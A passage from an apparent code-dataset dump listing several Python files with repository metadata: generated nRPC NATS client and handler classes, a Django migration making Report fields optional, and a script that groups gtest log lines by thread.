1, (6, 5): 0, (6, 6): 1, (6, 7): 0, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 0, (1, 2): 1, (1, 3): 1, (1, 4): 0, (1, 5): 1, (1, 6): 1, (1, 7): 0, (2, 0): 1, (2, 1): 0, (2, 2): 1, (2, 3): 0, (2, 4): 1, (2, 5): 0, (2, 6): 0, (2, 7): 1, (3, 0): 0, (3, 1): 0, (3, 2): 0, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 1, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 1, (4, 5): 1, (4, 6): 1, (4, 7): 1, (5, 0): 1, (5, 1): 0, (5, 2): 0, (5, 3): 0, (5, 4): 1, (5, 5): 1, (5, 6): 0, (5, 7): 1, (6, 0): 0, (6, 1): 1, (6, 2): 1, (6, 3): 1, (6, 4): 1, (6, 5): 0, (6, 6): 1, (6, 7): 0, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 0, (1, 1): 1, (1, 2): 1, (1, 3): 1, (1, 4): 1, (1, 5): 0, (1, 6): 1, (1, 7): 0, (2, 0): 1, (2, 1): 0, (2, 2): 0, (2, 3): 0, (2, 4): 1, (2, 5): 1, (2, 6): 0, (2, 7): 1, (3, 0): 1, (3, 1): 1, (3, 2): 1, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 1, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 1, (4, 5): 1, (4, 6): 1, (4, 7): 0, (5, 0): 1, (5, 1): 1, (5, 2): 1, (5, 3): 1, (5, 4): 0, (5, 5): 1, (5, 6): 0, (5, 7): 1, (6, 0): 1, (6, 1): 1, (6, 2): 1, (6, 3): 0, (6, 4): 1, (6, 5): 0, (6, 6): 1, (6, 7): 1, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 1, (1, 2): 1, (1, 3): 0, (1, 4): 1, (1, 5): 1, (1, 6): 0, (1, 7): 1, (2, 0): 1, (2, 1): 1, (2, 2): 0, (2, 3): 1, (2, 4): 0, (2, 5): 0, (2, 6): 1, (2, 7): 1, (3, 0): 1, (3, 1): 0, (3, 2): 1, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 0, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 1, (4, 5): 1, (4, 6): 1, (4, 7): 1, (5, 0): 1, (5, 1): 1, 
(5, 2): 1, (5, 3): 1, (5, 4): 1, (5, 5): 1, (5, 6): 1, (5, 7): 1, (6, 0): 1, (6, 1): 1, (6, 2): 1, (6, 3): 1, (6, 4): 1, (6, 5): 0, (6, 6): 1, (6, 7): 1, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 1, (1, 2): 1, (1, 3): 0, (1, 4): 1, (1, 5): 0, (1, 6): 1, (1, 7): 1, (2, 0): 1, (2, 1): 1, (2, 2): 0, (2, 3): 1, (2, 4): 0, (2, 5): 1, (2, 6): 1, (2, 7): 1, (3, 0): 1, (3, 1): 0, (3, 2): 1, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 0, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 1, (4, 5): 1, (4, 6): 0, (4, 7): 0, (5, 0): 1, (5, 1): 1, (5, 2): 1, (5, 3): 1, (5, 4): 1, (5, 5): 0, (5, 6): 1, (5, 7): 1, (6, 0): 1, (6, 1): 1, (6, 2): 1, (6, 3): 1, (6, 4): 1, (6, 5): 0, (6, 6): 1, (6, 7): 1, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 1, (1, 2): 1, (1, 3): 0, (1, 4): 1, (1, 5): 1, (1, 6): 1, (1, 7): 1, (2, 0): 1, (2, 1): 1, (2, 2): 0, (2, 3): 1, (2, 4): 1, (2, 5): 1, (2, 6): 1, (2, 7): 1, (3, 0): 1, (3, 1): 0, (3, 2): 1, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 0, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 1, (4, 5): 1, (4, 6): 1, (4, 7): 1, (5, 0): 1, (5, 1): 1, (5, 2): 1, (5, 3): 1, (5, 4): 0, (5, 5): 0, (5, 6): 1, (5, 7): 1, (6, 0): 1, (6, 1): 0, (6, 2): 1, (6, 3): 0, (6, 4): 1, (6, 5): 1, (6, 6): 0, (6, 7): 1, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}]
| 5,654
| 5,654
| 0.27255
| 1,537
| 5,654
| 1.002602
| 0.005856
| 0.125892
| 0.044776
| 0.038936
| 0.988319
| 0.979234
| 0.979234
| 0.979234
| 0.968851
| 0.968851
| 0
| 0.372906
| 0.271489
| 5,654
| 1
| 5,654
| 5,654
| 0.001214
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
02027c5d8ec756df9934f57dbc6757bab9198864
| 14,669
|
py
|
Python
|
examples/alloptions/alloptions_nrpc.py
|
nats-rpc/python-nrpc
|
1c8699f4c544ca988ce2f7afbe35033afd47f045
|
[
"MIT"
] | 6
|
2019-02-28T22:45:01.000Z
|
2021-02-04T16:09:52.000Z
|
examples/alloptions/alloptions_nrpc.py
|
nats-rpc/python-nrpc
|
1c8699f4c544ca988ce2f7afbe35033afd47f045
|
[
"MIT"
] | null | null | null |
examples/alloptions/alloptions_nrpc.py
|
nats-rpc/python-nrpc
|
1c8699f4c544ca988ce2f7afbe35033afd47f045
|
[
"MIT"
] | 1
|
2019-06-30T13:36:46.000Z
|
2019-06-30T13:36:46.000Z
|
# This file is automatically generated from alloptions.proto, DO NOT EDIT!
import asyncio
import nats.aio
import nrpc
import nrpc.exc
from nrpc import nrpc_pb2
import nrpc.nrpc_pb2 as nrpc_dot_nrpc__pb2
import alloptions_pb2 as alloptions__pb2
# Package-level NATS subject settings generated from the .proto options.
# Full subjects are assembled as "root.<instance>.custom_subject.<method>".
PKG_SUBJECT = "root"
PKG_SUBJECT_PARAMS = ["instance"]
PKG_SUBJECT_PARAMS_COUNT = 1
# Service-level subject component; this service declares no subject parameters.
SvcCustomSubject_SUBJECT = "custom_subject"
SvcCustomSubject_SUBJECT_PARAMS = []
SvcCustomSubject_SUBJECT_PARAMS_COUNT = 0
class SvcCustomSubjectHandler:
    """Server-side dispatcher for the SvcCustomSubject service.

    Routes incoming NATS messages to the wrapped ``server`` implementation.
    ``methods`` maps each wire-level method subject token to a tuple of
    (implementation name, subject-parameter count, request message type or
    None, has_reply, void_reply, streamed_reply).
    """

    methods = {
        "mt_simple_reply": (
            "MtSimpleReply",
            0,
            alloptions__pb2.StringArg,
            True,
            False,
            False,
        ),
        "mtvoidreply": ("MtVoidReply", 0, alloptions__pb2.StringArg, True, True, False),
        "mtnorequest": (
            "MtNoRequest",
            0,
            nrpc_dot_nrpc__pb2.NoRequest,
            True,
            False,
            False,
        ),
        "mtstreamedreply": (
            "MtStreamedReply",
            0,
            alloptions__pb2.StringArg,
            True,
            False,
            True,
        ),
        "mtvoidreqstreamedreply": (
            "MtVoidReqStreamedReply",
            0,
            None,
            True,
            False,
            True,
        ),
    }

    def __init__(self, nc, server):
        # nc: NATS connection used to publish replies.
        # server: user object implementing the methods listed in ``methods``.
        self.nc = nc
        self.server = server

    def subject(self, pkg_instance="*", method=">"):
        """Return the NATS subject to subscribe this handler on.

        Defaults produce a wildcard subscription covering every instance
        and every method of the service.
        """
        return ".".join(["root", pkg_instance, SvcCustomSubject_SUBJECT, method])

    async def handler(self, msg):
        """Decode *msg*, call the matching server method, publish its reply.

        Implementation errors are serialized back to the caller (prefixed
        with a 0x00 marker byte) when the method has a reply; unexpected
        failures are logged to stdout.
        """
        # Pre-initialized so the logging in the outer ``except`` cannot hit
        # an UnboundLocalError when subject parsing or the method lookup
        # fails before a method name has been resolved.
        mname = "<unknown>"
        try:
            pkg_params, svc_params, mt_subject, tail = nrpc.parse_subject(
                PKG_SUBJECT,
                PKG_SUBJECT_PARAMS_COUNT,
                SvcCustomSubject_SUBJECT,
                SvcCustomSubject_SUBJECT_PARAMS_COUNT,
                msg.subject,
            )
            (
                mname,
                params_count,
                input_type,
                has_reply,
                void_reply,
                streamed_reply,
            ) = self.methods[mt_subject]
            mt_params, count = nrpc.parse_subject_tail(params_count, tail)
            method = getattr(self.server, mname)
            if input_type is not None:
                req = input_type.FromString(msg.data)
                mt_params.append(req)
            err = None
            if streamed_reply:
                # Streamed replies are fully handled by the nrpc runtime.
                await nrpc.streamed_reply_handler(
                    self.nc, msg.reply, method(*mt_params)
                )
                return
            try:
                rep = await method(*mt_params)
            except nrpc.exc.NrpcError as e:
                err = e.as_nrpc_error()
            except Exception as e:
                err = nrpc.exc.server_error(e)
            else:
                if isinstance(rep, nrpc.ClientError):
                    err = rep
                elif void_reply and rep is not None:
                    raise ValueError(
                        "Method %s implementation should return None" % mname
                    )
            if has_reply:
                if err is not None:
                    # Leading NUL byte marks an encoded nrpc Error payload.
                    rawRep = b"\x00" + err.SerializeToString()
                elif rep is not None:
                    rawRep = rep.SerializeToString()
                else:
                    rawRep = b""
                await self.nc.publish(msg.reply, rawRep)
        except Exception as e:
            import traceback
            traceback.print_exc()
            print("Error in SvcCustomSubject.%s handler:" % mname, e)
class SvcCustomSubjectClient:
    """Client stub for the SvcCustomSubject service."""

    def __init__(self, nc, pkg_instance):
        # nc: NATS connection; pkg_instance: package subject parameter.
        self.nc = nc
        self.pkg_instance = pkg_instance

    def _subject(self, method):
        # root.<pkg_instance>.custom_subject.<method>
        return ".".join(
            [PKG_SUBJECT, self.pkg_instance, SvcCustomSubject_SUBJECT, method]
        )

    async def MtSimpleReply(self, req):
        """Request/reply call; returns the decoded SimpleStringReply."""
        raw = await self.nc.timed_request(
            self._subject("mt_simple_reply"), req.SerializeToString(), 5
        )
        if raw.data and raw.data[0] == 0:
            raise nrpc.exc.from_error(nrpc_pb2.Error.FromString(raw.data[1:]))
        return alloptions__pb2.SimpleStringReply.FromString(raw.data)

    async def MtVoidReply(self, req):
        """Request/reply call whose server answer must be empty."""
        raw = await self.nc.timed_request(
            self._subject("mtvoidreply"), req.SerializeToString(), 5
        )
        if raw.data and raw.data[0] == 0:
            raise nrpc.exc.from_error(nrpc_pb2.Error.FromString(raw.data[1:]))
        if len(raw.data):
            raise ValueError("Received a non-empty response")
        return None

    async def MtNoRequest(self, req):
        """Request/reply call; returns the decoded SimpleStringReply."""
        raw = await self.nc.timed_request(
            self._subject("mtnorequest"), req.SerializeToString(), 5
        )
        if raw.data and raw.data[0] == 0:
            raise nrpc.exc.from_error(nrpc_pb2.Error.FromString(raw.data[1:]))
        return alloptions__pb2.SimpleStringReply.FromString(raw.data)

    async def MtStreamedReply(self, req):
        """Async generator yielding each streamed SimpleStringReply."""
        raw_req = req.SerializeToString()
        async for chunk in nrpc.streamed_reply_request(
            self.nc, self._subject("mtstreamedreply"), raw_req, 5
        ):
            yield alloptions__pb2.SimpleStringReply.FromString(chunk.data)

    async def MtVoidReqStreamedReply(self):
        """Async generator yielding streamed replies for a void request."""
        async for chunk in nrpc.streamed_reply_request(
            self.nc, self._subject("mtvoidreqstreamedreply"), b"", 5
        ):
            yield alloptions__pb2.SimpleStringReply.FromString(chunk.data)
# Subject tokens for the SvcSubjectParams service (one "clientid" parameter).
SvcSubjectParams_SUBJECT = "svcsubjectparams"
SvcSubjectParams_SUBJECT_PARAMS = ["clientid"]
SvcSubjectParams_SUBJECT_PARAMS_COUNT = 1
class SvcSubjectParamsHandler:
    """Server-side dispatcher for the SvcSubjectParams service.

    ``methods`` maps each wire-level method subject token to a tuple of
    (implementation name, subject-parameter count, request message type or
    None, has_reply, void_reply, streamed_reply).
    """

    methods = {
        "mtwithsubjectparams": ("MtWithSubjectParams", 2, None, True, False, False),
        "mtnoreply": ("MtNoReply", 0, None, False, False, False),
        "mtnorequestwparams": (
            "MtNoRequestWParams",
            1,
            nrpc_dot_nrpc__pb2.NoRequest,
            True,
            False,
            False,
        ),
    }

    def __init__(self, nc, server):
        # nc: NATS connection used to publish replies.
        # server: user object implementing the methods listed in ``methods``.
        self.nc = nc
        self.server = server

    def subject(self, pkg_instance="*", svc_clientid="*", method=">"):
        """Return the NATS subject to subscribe this handler on (wildcards by default)."""
        return ".".join(
            ["root", pkg_instance, SvcSubjectParams_SUBJECT, svc_clientid, method]
        )

    async def handler(self, msg):
        """Decode *msg*, call the matching server method, publish its reply.

        Implementation errors are serialized back to the caller (prefixed
        with a 0x00 marker byte) when the method has a reply; unexpected
        failures are logged to stdout.
        """
        # Pre-initialized so the logging in the outer ``except`` cannot hit
        # an UnboundLocalError when subject parsing or the method lookup
        # fails before a method name has been resolved.
        mname = "<unknown>"
        try:
            pkg_params, svc_params, mt_subject, tail = nrpc.parse_subject(
                PKG_SUBJECT,
                PKG_SUBJECT_PARAMS_COUNT,
                SvcSubjectParams_SUBJECT,
                SvcSubjectParams_SUBJECT_PARAMS_COUNT,
                msg.subject,
            )
            (
                mname,
                params_count,
                input_type,
                has_reply,
                void_reply,
                streamed_reply,
            ) = self.methods[mt_subject]
            mt_params, count = nrpc.parse_subject_tail(params_count, tail)
            method = getattr(self.server, mname)
            if input_type is not None:
                req = input_type.FromString(msg.data)
                mt_params.append(req)
            err = None
            if streamed_reply:
                # Streamed replies are fully handled by the nrpc runtime.
                await nrpc.streamed_reply_handler(
                    self.nc, msg.reply, method(*mt_params)
                )
                return
            try:
                rep = await method(*mt_params)
            except nrpc.exc.NrpcError as e:
                err = e.as_nrpc_error()
            except Exception as e:
                err = nrpc.exc.server_error(e)
            else:
                if isinstance(rep, nrpc.ClientError):
                    err = rep
                elif void_reply and rep is not None:
                    raise ValueError(
                        "Method %s implementation should return None" % mname
                    )
            if has_reply:
                if err is not None:
                    # Leading NUL byte marks an encoded nrpc Error payload.
                    rawRep = b"\x00" + err.SerializeToString()
                elif rep is not None:
                    rawRep = rep.SerializeToString()
                else:
                    rawRep = b""
                await self.nc.publish(msg.reply, rawRep)
        except Exception as e:
            import traceback
            traceback.print_exc()
            print("Error in SvcSubjectParams.%s handler:" % mname, e)
class SvcSubjectParamsClient:
    """Client stub for the SvcSubjectParams service."""

    def __init__(self, nc, pkg_instance, svc_clientid):
        # nc: NATS connection; the two params fill the subject placeholders.
        self.nc = nc
        self.pkg_instance = pkg_instance
        self.svc_clientid = svc_clientid

    def _subject(self, method, *params):
        # root.<pkg_instance>.svcsubjectparams.<clientid>.<method>[.<params>...]
        tokens = [
            PKG_SUBJECT,
            self.pkg_instance,
            SvcSubjectParams_SUBJECT,
            self.svc_clientid,
            method,
        ]
        tokens.extend(params)
        return ".".join(tokens)

    async def MtWithSubjectParams(self, mp1, mp2):
        """Request/reply call carrying two extra subject parameters."""
        raw = await self.nc.timed_request(
            self._subject("mtwithsubjectparams", mp1, mp2), b"", 5
        )
        if raw.data and raw.data[0] == 0:
            raise nrpc.exc.from_error(nrpc_pb2.Error.FromString(raw.data[1:]))
        return alloptions__pb2.SimpleStringReply.FromString(raw.data)

    async def MtNoReply(self):
        """Fire-and-forget publish; no reply is expected."""
        await self.nc.publish(self._subject("mtnoreply"), b"")

    async def MtNoRequestWParams(self, mp1, req):
        """Request/reply call with one subject parameter and a request body."""
        raw = await self.nc.timed_request(
            self._subject("mtnorequestwparams", mp1), req.SerializeToString(), 5
        )
        if raw.data and raw.data[0] == 0:
            raise nrpc.exc.from_error(nrpc_pb2.Error.FromString(raw.data[1:]))
        return alloptions__pb2.SimpleStringReply.FromString(raw.data)
# Subject tokens for the NoRequestService service (no subject parameters).
NoRequestService_SUBJECT = "norequestservice"
NoRequestService_SUBJECT_PARAMS = []
NoRequestService_SUBJECT_PARAMS_COUNT = 0
class NoRequestServiceHandler:
    """Server-side dispatcher for the NoRequestService service.

    ``methods`` maps each wire-level method subject token to a tuple of
    (implementation name, subject-parameter count, request message type or
    None, has_reply, void_reply, streamed_reply).
    """

    methods = {
        "mtnorequest": (
            "MtNoRequest",
            0,
            nrpc_dot_nrpc__pb2.NoRequest,
            True,
            False,
            False,
        ),
    }

    def __init__(self, nc, server):
        # nc: NATS connection used to publish replies.
        # server: user object implementing the methods listed in ``methods``.
        self.nc = nc
        self.server = server

    def subject(self, pkg_instance="*", method=">"):
        """Return the NATS subject to subscribe this handler on (wildcards by default)."""
        return ".".join(["root", pkg_instance, NoRequestService_SUBJECT, method])

    async def handler(self, msg):
        """Decode *msg*, call the matching server method, publish its reply.

        Implementation errors are serialized back to the caller (prefixed
        with a 0x00 marker byte) when the method has a reply; unexpected
        failures are logged to stdout.
        """
        # Pre-initialized so the logging in the outer ``except`` cannot hit
        # an UnboundLocalError when subject parsing or the method lookup
        # fails before a method name has been resolved.
        mname = "<unknown>"
        try:
            pkg_params, svc_params, mt_subject, tail = nrpc.parse_subject(
                PKG_SUBJECT,
                PKG_SUBJECT_PARAMS_COUNT,
                NoRequestService_SUBJECT,
                NoRequestService_SUBJECT_PARAMS_COUNT,
                msg.subject,
            )
            (
                mname,
                params_count,
                input_type,
                has_reply,
                void_reply,
                streamed_reply,
            ) = self.methods[mt_subject]
            mt_params, count = nrpc.parse_subject_tail(params_count, tail)
            method = getattr(self.server, mname)
            if input_type is not None:
                req = input_type.FromString(msg.data)
                mt_params.append(req)
            err = None
            if streamed_reply:
                # Streamed replies are fully handled by the nrpc runtime.
                await nrpc.streamed_reply_handler(
                    self.nc, msg.reply, method(*mt_params)
                )
                return
            try:
                rep = await method(*mt_params)
            except nrpc.exc.NrpcError as e:
                err = e.as_nrpc_error()
            except Exception as e:
                err = nrpc.exc.server_error(e)
            else:
                if isinstance(rep, nrpc.ClientError):
                    err = rep
                elif void_reply and rep is not None:
                    raise ValueError(
                        "Method %s implementation should return None" % mname
                    )
            if has_reply:
                if err is not None:
                    # Leading NUL byte marks an encoded nrpc Error payload.
                    rawRep = b"\x00" + err.SerializeToString()
                elif rep is not None:
                    rawRep = rep.SerializeToString()
                else:
                    rawRep = b""
                await self.nc.publish(msg.reply, rawRep)
        except Exception as e:
            import traceback
            traceback.print_exc()
            print("Error in NoRequestService.%s handler:" % mname, e)
class NoRequestServiceClient:
    """Client stub for the NoRequestService service."""

    def __init__(self, nc, pkg_instance):
        # nc: NATS connection; pkg_instance: package subject parameter.
        self.nc = nc
        self.pkg_instance = pkg_instance

    def _subject(self, method):
        # root.<pkg_instance>.norequestservice.<method>
        return ".".join(
            [PKG_SUBJECT, self.pkg_instance, NoRequestService_SUBJECT, method]
        )

    async def MtNoRequest(self, req):
        """Request/reply call; returns the decoded SimpleStringReply."""
        raw = await self.nc.timed_request(
            self._subject("mtnorequest"), req.SerializeToString(), 5
        )
        if raw.data and raw.data[0] == 0:
            raise nrpc.exc.from_error(nrpc_pb2.Error.FromString(raw.data[1:]))
        return alloptions__pb2.SimpleStringReply.FromString(raw.data)
| 28.706458
| 88
| 0.508351
| 1,328
| 14,669
| 5.406627
| 0.09488
| 0.022563
| 0.031337
| 0.036769
| 0.768942
| 0.747911
| 0.731337
| 0.729805
| 0.716295
| 0.716295
| 0
| 0.00862
| 0.406844
| 14,669
| 510
| 89
| 28.762745
| 0.816573
| 0.004908
| 0
| 0.777778
| 1
| 0
| 0.054334
| 0.004522
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02
| false
| 0
| 0.022222
| 0.006667
| 0.088889
| 0.013333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
021e2cd1713565db577a0e08a48da7e216db290d
| 33
|
py
|
Python
|
inference/models/__init__.py
|
JRC1995/Continuous-RvNN
|
b33bdbd2f80119dc0fa3ed6d44865a3d45bc1e81
|
[
"MIT"
] | 9
|
2021-06-08T13:29:26.000Z
|
2022-03-29T17:29:46.000Z
|
inference/models/__init__.py
|
JRC1995/Continuous-RvNN
|
b33bdbd2f80119dc0fa3ed6d44865a3d45bc1e81
|
[
"MIT"
] | null | null | null |
inference/models/__init__.py
|
JRC1995/Continuous-RvNN
|
b33bdbd2f80119dc0fa3ed6d44865a3d45bc1e81
|
[
"MIT"
] | null | null | null |
from .NLI_model import NLI_model
| 16.5
| 32
| 0.848485
| 6
| 33
| 4.333333
| 0.666667
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0281f8b1922a449405da5398bf0841f4ebc00f92
| 8,650
|
py
|
Python
|
app/migrations/0008_auto_20200516_1705.py
|
abhijmics/Mediclear-Admin
|
d6f84d5aa94303b19e115e6d993caadda4df2ecf
|
[
"MIT"
] | null | null | null |
app/migrations/0008_auto_20200516_1705.py
|
abhijmics/Mediclear-Admin
|
d6f84d5aa94303b19e115e6d993caadda4df2ecf
|
[
"MIT"
] | null | null | null |
app/migrations/0008_auto_20200516_1705.py
|
abhijmics/Mediclear-Admin
|
d6f84d5aa94303b19e115e6d993caadda4df2ecf
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.5 on 2020-05-16 11:35
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated 2020-05-16: relax every Report column to optional.

    Each operation rewrites one column of the ``report`` model as a
    nullable, blankable ``CharField(max_length=120)``; the q1..q11 survey
    columns additionally carry Yes/No choices. The operations are built
    from name lists instead of 45 hand-written blocks.
    """

    dependencies = [
        ('app', '0007_auto_20200516_1700'),
    ]

    # Column names, in the exact order the generated file listed them.
    _plain_fields = [
        'address', 'albumin', 'backmovements', 'blood_group', 'chestlung',
        'comment', 'curvicalspine', 'diastolic', 'dob', 'email', 'gender',
        'hb', 'hdl', 'hearing', 'heartsound', 'height', 'jointmovements',
        'ldl', 'name', 'peripheralpulse', 'plateletscount', 'pulserate',
    ]
    _question_fields = [
        'q1', 'q10', 'q11', 'q2', 'q3', 'q4', 'q5', 'q6', 'q7', 'q8', 'q9',
    ]
    _plain_fields_tail = [
        'rbc', 'reflexes', 'result', 'rh_factor', 'rombergs', 'sugar',
        'systolic', 'tlc', 'triglycerides', 'upperlimbs', 'vision', 'weight',
    ]

    operations = (
        [
            migrations.AlterField(
                model_name='report',
                name=column,
                field=models.CharField(blank=True, max_length=120, null=True),
            )
            for column in _plain_fields
        ]
        + [
            migrations.AlterField(
                model_name='report',
                name=column,
                field=models.CharField(
                    blank=True,
                    choices=[('Yes', 'Yes'), ('No', 'No')],
                    max_length=120,
                    null=True,
                ),
            )
            for column in _question_fields
        ]
        + [
            migrations.AlterField(
                model_name='report',
                name=column,
                field=models.CharField(blank=True, max_length=120, null=True),
            )
            for column in _plain_fields_tail
        ]
    )
| 36.192469
| 114
| 0.540116
| 851
| 8,650
| 5.378378
| 0.102233
| 0.196635
| 0.245794
| 0.285121
| 0.906052
| 0.906052
| 0.897531
| 0.897531
| 0.897531
| 0.897531
| 0
| 0.030354
| 0.318266
| 8,650
| 238
| 115
| 36.344538
| 0.745803
| 0.005202
| 0
| 0.775862
| 1
| 0
| 0.080437
| 0.002673
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00431
| 0
| 0.017241
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5a22be3bc32a63884832f9ab0f75b0c6ebee87f3
| 3,230
|
py
|
Python
|
tools/deinterleave.py
|
ctring/Detock
|
a1171a511d9cd1f79cc3a8d54ec17f759d088de4
|
[
"MIT"
] | null | null | null |
tools/deinterleave.py
|
ctring/Detock
|
a1171a511d9cd1f79cc3a8d54ec17f759d088de4
|
[
"MIT"
] | null | null | null |
tools/deinterleave.py
|
ctring/Detock
|
a1171a511d9cd1f79cc3a8d54ec17f759d088de4
|
[
"MIT"
] | null | null | null |
"""Group output of gtest by thread id
Example usage:
> python3 tools/deinterleave.py <<EOF
I1226 06:33:06.426666 11224 broker.cpp:113] Bound Broker to: ipc:///tmp/test_e2e0
I1226 06:33:06.427703 11224 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e0
I1226 06:33:06.447345 11232 broker.cpp:113] Bound Broker to: ipc:///tmp/test_e2e1
I1226 06:33:06.447707 11232 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e0
I1226 06:33:06.447993 11232 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e1
I1226 06:33:06.448770 11232 broker.cpp:146] Waiting for READY messages from other machines...
I1226 06:33:06.448783 11232 broker.cpp:172] Received READY message from /tmp/test_e2e1 (rep: 0, part: 1)
I1226 06:33:06.449044 11232 broker.cpp:172] Received READY message from /tmp/test_e2e0 (rep: 0, part: 0)
I1226 06:33:06.449077 11224 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e1
I1226 06:33:06.449609 11224 broker.cpp:146] Waiting for READY messages from other machines...
I1226 06:33:06.449635 11224 broker.cpp:172] Received READY message from /tmp/test_e2e0 (rep: 0, part: 0)
I1226 06:33:06.449654 11224 broker.cpp:172] Received READY message from /tmp/test_e2e1 (rep: 0, part: 1)
I1226 06:33:06.450145 11232 broker.cpp:181] All READY messages received
I1226 06:33:06.450448 11224 broker.cpp:181] All READY messages received
EOF
========================================================================================================
Thread "11224"
I1226 06:33:06.426666 11224 broker.cpp:113] Bound Broker to: ipc:///tmp/test_e2e0
I1226 06:33:06.427703 11224 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e0
I1226 06:33:06.449077 11224 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e1
I1226 06:33:06.449609 11224 broker.cpp:146] Waiting for READY messages from other machines...
I1226 06:33:06.449635 11224 broker.cpp:172] Received READY message from /tmp/test_e2e0 (rep: 0, part: 0)
I1226 06:33:06.449654 11224 broker.cpp:172] Received READY message from /tmp/test_e2e1 (rep: 0, part: 1)
I1226 06:33:06.450448 11224 broker.cpp:181] All READY messages received
Thread "11232"
I1226 06:33:06.447345 11232 broker.cpp:113] Bound Broker to: ipc:///tmp/test_e2e1
I1226 06:33:06.447707 11232 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e0
I1226 06:33:06.447993 11232 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e1
I1226 06:33:06.448770 11232 broker.cpp:146] Waiting for READY messages from other machines...
I1226 06:33:06.448783 11232 broker.cpp:172] Received READY message from /tmp/test_e2e1 (rep: 0, part: 1)
I1226 06:33:06.449044 11232 broker.cpp:172] Received READY message from /tmp/test_e2e0 (rep: 0, part: 0)
I1226 06:33:06.450145 11232 broker.cpp:181] All READY messages received
"""
import re
import sys
logs_per_thread = {}
max_len = 10
for line in sys.stdin:
log = line.strip()
max_len = max(max_len, len(log))
tokens = re.split("\s+", log)
if len(tokens) > 3:
thread_id = tokens[2]
logs_per_thread.setdefault(thread_id, []).append(log)
print()
print("=" * max_len)
for thread_id in logs_per_thread:
print(f'Thread "{thread_id}"')
for log in logs_per_thread[thread_id]:
print(log)
print()
| 52.95082
| 104
| 0.721672
| 568
| 3,230
| 4.038732
| 0.149648
